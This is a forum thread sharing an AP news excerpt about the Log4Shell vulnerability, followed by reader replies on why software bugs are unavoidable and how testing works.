HomeLatest ThreadsGreatest ThreadsForums & GroupsMy SubscriptionsMy Posts
DU Home » Latest Threads » Forums & Groups » Main » Latest Breaking News (Forum) » Global race to patch crit...

Fri Dec 10, 2021, 07:19 PM

Global race to patch critical computer bug

Source: AP

By FRANK BAJAK

BOSTON (AP) — Security experts around the world raced Friday to patch one of the worst computer vulnerabilities discovered in years, a critical flaw in open-source code widely used across industry and government in cloud services and enterprise software.

“I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors. Untold millions of servers have it installed, and experts said the fallout would not be known for several days.

New Zealand’s computer emergency response team was among the first to report that the flaw in a Java-language utility for Apache servers used to log user activity was being “actively exploited in the wild” just hours after it was publicly reported Thursday and a patch released.

The vulnerability, dubbed ‘Log4Shell,’ was rated 10 on a scale of one to 10, the worst possible. Anyone with the exploit can get full acces s to an unpatched machine.



FILE - Lydia Winters shows off Microsoft's "Minecraft" built specifically for HoloLens at the Xbox E3 2015 briefing before Electronic Entertainment Expo, June 15, 2015, in Los Angeles. Security experts around the world raced Friday, Dec. 10, 2021, to patch one of the worst computer vulnerabilities discovered in years, a critical flaw in open-source code widely used across industry and government in cloud services and enterprise software. Cybersecurity experts say users of the online game Minecraft have already exploited it to breach other users by pasting a short message into in a chat box. (AP Photo/Damian Dovarganes, File)


Read more: https://apnews.com/article/technology-business-lifestyle-software-apple-inc-aed3cc628fc602079b100757974c8f01

21 replies, 3134 views

Reply to this thread

Back to top Alert abuse

Always highlight: 10 newest replies | Replies posted after I mark a forum
Replies to this discussion thread
Arrow 21 replies Author Time Post
Reply Global race to patch critical computer bug (Original post)
Omaha Steve Dec 2021 OP
totodeinhere Dec 2021 #1
rickford66 Dec 2021 #2
totodeinhere Dec 2021 #3
rickford66 Dec 2021 #4
debsy Dec 2021 #6
Pobeka Dec 2021 #5
rickford66 Dec 2021 #8
totodeinhere Dec 2021 #11
erronis Dec 2021 #7
DavidDvorkin Dec 2021 #9
patphil Dec 2021 #10
Lucky Luciano Dec 2021 #12
TheRickles Dec 2021 #13
Firestorm49 Dec 2021 #15
Ouroborosnek Dec 2021 #16
discntnt_irny_srcsm Dec 2021 #17
Polybius Dec 2021 #18
cadoman Dec 2021 #20
Firestorm49 Dec 2021 #14
getagrip_already Dec 2021 #19
HuskyOffset Dec 2021 #21

Response to Omaha Steve (Original post)

Fri Dec 10, 2021, 08:17 PM

1. I am not very tech savvy but I have always wondered why there are so many bugs in software.

Why can't they test it and get it right before releasing it?

Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #1)

Fri Dec 10, 2021, 08:42 PM

2. You're joking, right ?

Reply to this post

Back to top Alert abuse Link here Permalink


Response to rickford66 (Reply #2)

Fri Dec 10, 2021, 08:47 PM

3. No, I'm not joking. I am sick and tired of computer bugs. n/t

Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #3)

Fri Dec 10, 2021, 09:42 PM

4. Have you written code for commercial or military programs ?

That code is tested over and over several ways and there will always be bugs. Do not ride in a self driving car. I would never bet on even the simplest code I've ever written.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to rickford66 (Reply #4)

Fri Dec 10, 2021, 09:59 PM

6. I'm not being mean, I just know you have never worked in corporate IT.

The fact you asked "Why can't they test it and get it right before releasing it?" tells me so. I have worked in corporate IT for decades and it rarely works like that. Most sales people sell software on tight schedules for systems that they are not familiar with and that have never had due diligence performed on them. The timeframe and price tag is typically much lower than it should be . Customers and management push to get the product out the door as quickly as possible and oftentimes that results in an inferior product with many bugs that must be worked out in a production environment. And, yes, we humans are also not capable of thinking up the infinite scenarios that make a bug show itself. As rickfor66 stated, there will always be bugs.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #3)

Fri Dec 10, 2021, 09:47 PM

5. Then don't ever use a computer again. Sounds harsh but it's true.

There will never be a "bug free" world of computer software. It's virtually impossible.

New software is a lot better, but the exploits get more sophisticated.

I coded software as part of my job for 31 years, wrote over a million lines of working code, and we worked very hard to produce bug free code.

For a fun read on the problem, read Douglas Hofstadter's "Godel, Escher and Bach, An Eternal Golden Braid"

https://www.amazon.com/G%C3%B6del-Escher-Bach-Eternal-Golden/dp/0465026567

Reply to this post

Back to top Alert abuse Link here Permalink


Response to Pobeka (Reply #5)

Fri Dec 10, 2021, 10:46 PM

8. totodeinhere would sh*t a brick if he/she saw the kluges in S/W he/she depends on.

Years ago while ringing out a beta level auto pilot computer, our guys found out they could crash it with valid inputs. When reporting to the manufacturer, they were advised "not to do that". At another job, one of my buddies showed me a possible divide by zero on another flight computer. He reported it as he should and was told "that will never happen". What "if" it happens he asked. "We'll reboot it when we land." was the reply. That's why I always felt completely safe on the old 727's. Manual boosted controls. The only ones lost were weather related.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to Pobeka (Reply #5)

Sat Dec 11, 2021, 12:11 AM

11. Just because their wikl always be bugs doesn't mean that I shouldn't use a computer.

n/t

Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #1)

Fri Dec 10, 2021, 10:45 PM

7. The early chariots, carts, cars, airplanes, etc. all had bugs.

Many weren't discovered until thorough use.

And most of these things weren't connected to some global system where anybody/anywhere could test your apparatuses security and performance.

The best way to protect ourselves is to disconnect totally from any exchanges. Including voice (relaying fake news), etc.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #1)

Fri Dec 10, 2021, 10:51 PM

9. The delusion that bug-free software is possible

Is why there are companies getting rich selling corporate executives snazzy new methodologies and procedures that are guaranteed to produce bug-free code in no time at all.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #1)

Fri Dec 10, 2021, 11:28 PM

10. The problem is that bug don't come with flags that identify the presence of a bug.

There are millions of lines of code in a large scale computer application. These applications are very complex, and consist of many separate modules that all work together in a well planned out way. As a former programmer and tester, I can tell you that you can only find what you anticipate. A hacker looks at code, not in the way it is intended to be used, but in the ways it can be broken. It's much more difficult to identify all these possibilities than you can imagine.
Testing has its limits. The permutations of all the possibilities for how a large, complex, application can be used is such a large number that it would take an army of programmers decades to find and fix all of the possible vulnerabilities. Even code that has been around for decades can suddenly manifest a bug when someone does something unexpected while using the application. An operating system change can also reek havoc on an otherwise stable program. So can a hardware change. Neither of these are malicious, but can still mess things up.
Now imagine a hacker who specializes in breaking the "unbreakable".
It's essentially impossible to anticipate all the possible ways a piece of code can be taken advantage of by a hacker. Successful hackers have the uncanny ability to find weak points in hardware, firmware, or software.
It's a never ending battle between those who defend our computers and the attacks of hackers. And, in today's world, any newly discovered vulnerability may be quickly passed around in the hacker community.

I don't believe there will ever be a time when computer systems are absolutely safe from malicious attacks.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to patphil (Reply #10)

Sat Dec 11, 2021, 12:44 AM

12. So far, no mention of heisenbugs! The worst kind! Totally evil.

Race conditions, deadlocks, and other crap that only rears it’s ugly head randomly…blech!

Reply to this post

Back to top Alert abuse Link here Permalink


Response to patphil (Reply #10)

Sat Dec 11, 2021, 10:16 AM

13. Thanks for taking the time to explain this to non-IT DUers.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to patphil (Reply #10)

Sat Dec 11, 2021, 11:49 AM

15. Thank you. Your post is very informative. Perhaps it's time to unveil the "next generation"

of fool proof programming. I’m sure that by this time, our military has been using software that we may not see the benefit of for several more years. We were using the U2 and stealth technology well in advance of the public’s awareness. As what we like to think of as an “advanced” nation, with all of the brilliant minds at our disposal, we should be able to develop better, safer, quicker, and more reliable internet functions than that which we now have. Until then, tough luck.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #1)

Sat Dec 11, 2021, 12:14 PM

16. One of the priniciples of software testing

Is that testing can find bugs, but can never prove the absence of bugs.

I enjoy the field of software testing but there are some misunderstandings about what testing can/cannot cover.

If you think about a variety of scenarios and inputs into any system, the more complex it becomes, it becomes an impossible task to test every one. Have to make a risk-based assessment to test the most critical paths.

Unfortunately that means there's always a chance something will get released with a bug and have to do your best to identify it quickly and resolve.

Just to put a little perspective to this, imagine testing an application that has 5 input fields and each field has 10 possible values. To test EVERY possible combination the tester will have to run 5^10 = 9,765,625 tests, which is quite impossible no matter the project timescale.

[link:https://www.linkedin.com/pulse/10-software-testing-fallacies-kingsley-asuamah/|



Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #1)

Sat Dec 11, 2021, 12:54 PM

17. I work in software quality assurance. I have for decades.

The only way to come close to what you're suggesting is to have a rigid and formal set of requirements articulated before the architecture ever begins. Then to have design documents written that coders can follow precisely and then use software tools such as assemblers and compilers that were developed with the same level of rigor to create object code. Then to verify each and every requirement is met exactly without any unspecified activity. When all of this is done, there will be requirements that the code doesn't satisfy, tests that are valid, which the code/system doesn't pass. The requirements should be eliminated and the entire process restarted from the beginning.

Finally, evaluating the code exercising it with a full functional and performance validation that confirms that absolutely every line of code is operated and that there is no "dead code" is about the only way to do what you're asking. No one can afford it.

Code reuse and iterative updates and revisions provide some many permutations that no degree of pre-planning and assessment will ever be complete.

Have a cartoon:

Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #1)

Sat Dec 11, 2021, 02:31 PM

18. I can tell you aren't tech savvy lol

Code is huge for programs these days, there is always 1,000's of mistakes, some obvious, some not. This isn't the Atari 2600 days where one guy writes the entire code in a couple of weeks or less, although sometime I wish it was...

Reply to this post

Back to top Alert abuse Link here Permalink


Response to totodeinhere (Reply #1)

Sun Dec 12, 2021, 11:39 AM

20. there are certain products that have the level of testing you seek

But they tend to get updates less often, have fewer features, run slower, etc.

This may be the OS for you, totodeinhere:

https://www.openbsd.org/security.html

What's sad is even if the software folks do their part, there are still backdoors in a lot of hardware.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to Omaha Steve (Original post)


Response to Omaha Steve (Original post)

Sun Dec 12, 2021, 11:24 AM

19. fwiw, Apache is an open source web server.....

It is very common on linux servers of all kinds, embedded in devices like routers and iot appliances, and even in firewalls. It is available for windows, and is used extensively by applications, though MS has its own embedded web server (IIS).

In short, turning off apache would mean no web access to just about everything.

Reply to this post

Back to top Alert abuse Link here Permalink


Response to Omaha Steve (Original post)

Sun Dec 12, 2021, 07:27 PM

21. Ars Technica's article about it

For a good explanation, here is Ars Technica's article about it.

Reply to this post

Back to top Alert abuse Link here Permalink

Reply to this thread